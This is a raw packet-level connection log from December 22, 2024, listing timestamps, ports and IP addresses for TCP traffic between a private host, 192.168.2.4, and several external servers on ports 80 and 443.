Dec 22, 2024 02:16:48.290690899 CET	443	49863	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:48.290751934 CET	49863	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:48.290764093 CET	443	49863	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:48.541904926 CET	49867	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:48.541954994 CET	443	49867	216.58.208.238	192.168.2.4
Dec 22, 2024 02:16:48.542053938 CET	49867	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:48.551676035 CET	49867	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:48.551718950 CET	443	49867	216.58.208.238	192.168.2.4
Dec 22, 2024 02:16:49.042620897 CET	80	49865	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:49.044370890 CET	49865	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:49.045670033 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:49.045883894 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:49.165765047 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:49.165914059 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:49.165924072 CET	80	49851	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:49.166065931 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:49.166124105 CET	49851	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:49.213665962 CET	443	49863	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:49.213748932 CET	443	49863	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:49.213838100 CET	49863	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:49.225338936 CET	49863	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:49.225368977 CET	443	49863	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:49.286159039 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:49.287766933 CET	80	49866	212.193.31.8	192.168.2.4
Dec 22, 2024 02:16:49.288084030 CET	49866	80	192.168.2.4	212.193.31.8
Dec 22, 2024 02:16:49.519133091 CET	49874	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:49.519166946 CET	443	49874	216.58.208.238	192.168.2.4
Dec 22, 2024 02:16:49.519674063 CET	49874	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:49.555839062 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:49.555957079 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:49.556035042 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:49.571727037 CET	49858	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:49.571748018 CET	443	49858	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:49.657819986 CET	49875	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:49.657854080 CET	443	49875	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:49.657937050 CET	49875	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:49.658211946 CET	49875	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:49.658225060 CET	443	49875	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:49.698389053 CET	49874	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:49.698446035 CET	443	49874	216.58.208.238	192.168.2.4
Dec 22, 2024 02:16:50.073486090 CET	49876	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:50.073571920 CET	443	49876	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:50.073710918 CET	49876	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:50.074382067 CET	49876	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:50.074424982 CET	443	49876	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:50.266737938 CET	443	49867	216.58.208.238	192.168.2.4
Dec 22, 2024 02:16:50.266933918 CET	49867	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:50.267838001 CET	443	49867	216.58.208.238	192.168.2.4
Dec 22, 2024 02:16:50.267887115 CET	49867	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:50.345053911 CET	49867	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:50.345094919 CET	443	49867	216.58.208.238	192.168.2.4
Dec 22, 2024 02:16:50.346071005 CET	443	49867	216.58.208.238	192.168.2.4
Dec 22, 2024 02:16:50.346201897 CET	49867	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:50.347604990 CET	49867	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:50.391417980 CET	443	49867	216.58.208.238	192.168.2.4
Dec 22, 2024 02:16:50.948719025 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:50.948817015 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:50.949004889 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:50.949023008 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:50.949053049 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:50.949084044 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:50.949157000 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:50.949173927 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:50.949198008 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:50.949202061 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:50.949213028 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:50.949235916 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:50.949253082 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:50.949266911 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:50.949285984 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:50.949310064 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:50.949801922 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:50.949819088 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:50.949843884 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:50.949865103 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:50.950650930 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:50.950700045 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:50.956232071 CET	443	49875	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:50.956302881 CET	49875	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:50.989559889 CET	49875	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:50.989574909 CET	443	49875	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:50.989921093 CET	443	49875	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:50.991055012 CET	49875	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:50.991085052 CET	49875	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:50.991138935 CET	443	49875	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:50.991396904 CET	49866	80	192.168.2.4	212.193.31.8
Dec 22, 2024 02:16:50.991651058 CET	49877	80	192.168.2.4	212.193.31.8
Dec 22, 2024 02:16:51.068361998 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.068417072 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.070468903 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.070521116 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.070604086 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.070642948 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.078900099 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.078943968 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.079025984 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.079066992 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.087390900 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.087444067 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.087459087 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.087497950 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.095726013 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.095774889 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.095851898 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.095896959 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.104139090 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.104193926 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.104248047 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.104286909 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.111151934 CET	80	49877	212.193.31.8	192.168.2.4
Dec 22, 2024 02:16:51.111217022 CET	49877	80	192.168.2.4	212.193.31.8
Dec 22, 2024 02:16:51.111620903 CET	80	49866	212.193.31.8	192.168.2.4
Dec 22, 2024 02:16:51.111654043 CET	49877	80	192.168.2.4	212.193.31.8
Dec 22, 2024 02:16:51.111671925 CET	49866	80	192.168.2.4	212.193.31.8
Dec 22, 2024 02:16:51.112493992 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.112540007 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.112620115 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.112659931 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.120978117 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.121027946 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.121085882 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.121125937 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.129317999 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.129362106 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.129384995 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.129421949 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.137764931 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.137819052 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.187911987 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.187959909 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.190105915 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.190149069 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.194256067 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.194299936 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.198401928 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.198445082 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.202630997 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.202672958 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.206943989 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.206989050 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.211059093 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.211101055 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.215339899 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.215379953 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.215486050 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.215526104 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.223782063 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.223851919 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.223916054 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.223958015 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.231117010 CET	80	49877	212.193.31.8	192.168.2.4
Dec 22, 2024 02:16:51.232098103 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.232142925 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.232204914 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.232244968 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.240581036 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.240643978 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.240684032 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.240725040 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.248888969 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.248930931 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.249017000 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.249082088 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.257312059 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.257411003 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.257426977 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.257472038 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.265698910 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.265768051 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.265818119 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.265886068 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.274077892 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.274126053 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.274182081 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.274228096 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.282496929 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.282556057 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.289625883 CET	443	49876	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:51.289706945 CET	49876	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:51.290966988 CET	49876	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:51.290981054 CET	443	49876	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:51.291213036 CET	443	49876	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:51.292382002 CET	49876	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:51.292490959 CET	49876	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:51.292498112 CET	443	49876	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:51.307459116 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.307543993 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.307589054 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.307634115 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.309815884 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.309861898 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.309917927 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.309972048 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.314444065 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.314490080 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.314559937 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.314599991 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.319117069 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.319161892 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.319207907 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.319263935 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.323755026 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.323796988 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.323899031 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.323939085 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.328398943 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.328447104 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.328514099 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.328552008 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.333074093 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.333113909 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.333168983 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.333230019 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.337713957 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.337755919 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.337801933 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.337857008 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.342345953 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.342391968 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.344700098 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.344769001 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.344810009 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.344851971 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.349350929 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.349417925 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.349431992 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.349476099 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.353960991 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.354002953 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.354055882 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.354094028 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.358642101 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.358690977 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.358755112 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.358818054 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.363255024 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.363298893 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.363367081 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.363413095 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.367952108 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.367996931 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.368033886 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.368072033 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.372361898 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.372406006 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.372463942 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.372503996 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.376750946 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.376806974 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.376832008 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.376871109 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.381165981 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.381207943 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.381259918 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.381320953 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.385534048 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.385576963 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.385644913 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.385684967 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.386754036 CET	443	49874	216.58.208.238	192.168.2.4
Dec 22, 2024 02:16:51.386815071 CET	49874	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:51.387484074 CET	443	49874	216.58.208.238	192.168.2.4
Dec 22, 2024 02:16:51.387532949 CET	49874	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:51.389816046 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.389878035 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.389918089 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.389961004 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.394088984 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.394151926 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.394232988 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.394277096 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.398559093 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.398627996 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.398721933 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.398761988 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.402959108 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.402976990 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.403026104 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.403048038 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.407104969 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.407121897 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.407167912 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.407182932 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.427222967 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.427289009 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.427406073 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.427450895 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.429158926 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.429177046 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.429203987 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.429230928 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.433394909 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.433413029 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.433439016 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.433450937 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.435834885 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.435853004 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.435880899 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.435906887 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.437400103 CET	49874	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:51.437417030 CET	443	49874	216.58.208.238	192.168.2.4
Dec 22, 2024 02:16:51.437657118 CET	443	49874	216.58.208.238	192.168.2.4
Dec 22, 2024 02:16:51.437700987 CET	49874	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:51.438709021 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.438774109 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.438811064 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.438857079 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.439065933 CET	49874	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:51.441927910 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.441973925 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.442056894 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.442101002 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.445055962 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.445101976 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.445166111 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.445209026 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.449724913 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.449743032 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.449769020 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.449791908 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.451694965 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.451740980 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.451839924 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.451891899 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.454294920 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.454334974 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.454443932 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.454483032 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.457259893 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.457302094 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.457391977 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.457432032 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.459947109 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.459985971 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.460110903 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.460150957 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.462810993 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.462829113 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.462861061 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.462861061 CET	49872	80	192.168.2.4	31.41.244.11
